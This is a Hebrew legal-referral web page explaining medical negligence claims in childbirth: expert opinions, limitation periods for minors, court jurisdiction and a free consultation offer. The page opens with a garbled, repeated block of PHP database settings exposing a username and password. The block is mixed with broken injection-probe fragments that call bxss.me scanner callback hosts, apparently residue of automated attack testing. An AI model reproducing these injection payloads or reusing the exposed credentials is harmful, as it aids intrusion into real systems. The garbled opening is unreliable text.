$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_u $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ?>; $db_name = "1"; ?>b_name = "1"; ?>esb9769.bxss.me.')[3].to_s)+'"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>; ?>'hiteptjlxcjea2c2f9.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> רשלנות רפואית בלידה - עורך דין פרובונו לשירותך!
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
יצירת קשר
חיפוש באתר
מאמרים אחרונים

כל מה שחשוב לדעת על רשלנות רפואית בלידה

תאריך: 10/01/2011 15:16   מחבר: מערכת פרובונו

רשלנות רפואית בלידה מהווה עילת תביעה מרכזית ונפוצה בתחום רשלנות רפואית וזאת מפאת המורכבות הרבה הכרוכה בתהליך הלידה.

עילת תביעה מסוג זה משתרעת הן על רשלנות בטיפול ביולדת והן על רשלנות בטיפול בתינוק. 

כיצד ניתן לדעת שהתרחשה רשלנות רפואית בלידה?

טרם הגשת תביעה משפטית, הגורם אשר יכריע האם אכן התרחשה רשלנות רפואית בלידה הינו מומחה רפואי.

לפיכך, לכתב התביעה יש לצרף חוות דעת מטעם גניקולוג מיילד מומחה אשר יקבע האם אירעה רשלנות רפואית, האם קיים קשר בין ההתרשלות לבין הנזק שנגרם לתובע ומהו שיעורו המדויק של הנזק.

היקף הנזק נקבע בדרך כלל בהתאם לאחוזי הנכות הקבועים בתקנות הביטוח הלאומי.

כאן גם המקום להדגיש שהפיצוי במקרים אלה מיועד להשבת הניזוק למצב שקדם לפגיעה ואינו מכוון באופן כללי לצורכי ענישה של הגורם המעוול.

קרא עוד על הגשת תביעות נגד ביטוח לאומי

ניהול תביעת רשלנות רפואית בלידה

כאשר מתעורר חשד לרשלנות רפואית בלידה מומלץ לפנות אל עורך דין מנוסה בתחום רשלנות רפואית.

מאחר והנזק כתוצאה מרשלנות רפואית עלול להיות משמעותי ובמקרים מסוימים אף בלתי הפיך, ניהול תביעה שכזו באופן שגוי עלול להוביל לשלילת הזכאות לפיצויים עבור הנפגע, בין אם מדובר ביולדת ובין אם מדובר בוולד.

חוק ההתיישנות, התשי"ח - 1958 קובע בסעיף 5 שתביעה אשר עילתה אינה מקרקעין תתיישן בתוך פרק זמן של שבע שנים.

אולם, במידה ומדובר בקטין קובע החוק בסעיף 10 כלשונו, כי: "בחישוב תקופת ההתיישנות לא יבוא במניין הזמן שבו עדיין לא מלאו לתובע שמונה עשרה שנה".

תביעת רשלנות רפואית היא תביעה אזרחית ולכן תתנהל על פי כללי המשפט האזרחי ותקנות סדר הדין האזרחי, התשמ"ד - 1984.

בתחום המשפט האזרחי, הסמכות העניינית נקבעת בהתאם לסעד המבוקש בכתב התביעה.

היות ובתביעת רשלנות רפואית הסעד הנדרש הוא פיצויים, נקבעת הסמכות העניינית על פי סכום הפיצויים המבוקש: כאשר סכום זה עולה על שניים וחצי מליון ש"ח תוגש התביעה לבית המשפט המחוזי ותביעות שסכומן נמוך יותר יוגשו לבית משפט השלום.

לצורך הגברת סיכויי ההצלחה בתביעה חשוב להמציא לעורך הדין כל מסמך בעל משקל ראייתי ותרומה להוכחת התביעה.

בנוסף, קיימת חשיבות רבה לכך שבמסגרת כתב התביעה יצויינו כל הפרטים הנדרשים להוכחת עוולת הרשלנות, כפי שהיא קבועה בסעיף 35 לפקודת הנזיקין (נוסח חדש), התשכ"ח - 1968.

לחץ לקריאה מורחבת בנושא רשלנות רפואית בניתוח קיסרי

פניה לקבלת יעוץ משפטי במקרה של רשלנות רפואית בלידה

התנהלות מול הערכאות במקרה של רשלנות רפואית בלידה אינה הליך פשוט ולפיכך כדאי להיעזר בעורך דין המתמחה בתחום רשלנות רפואית.

בכדי לחסוך עבורך הוצאות כספיות הכרוכות בשכירת שירותי בא כוח, אנא מלא את הפרטים בטופס יצירת הקשר באתר. 

נשמח לנתב את פנייתך ללא תמורה לטיפול עורכי דין המתמחים ברשלנות רפואית, אשר יעמדו לימינך בהגשת התביעה וניהולה.
 

לקבלת סיוע אישי מטעם עורך דין מומחה בתחום רשלנות רפואית, לחץ כאן:
יעוץ משפטי חינם

ליחצו כאן להוספת תגובה
סגורסגור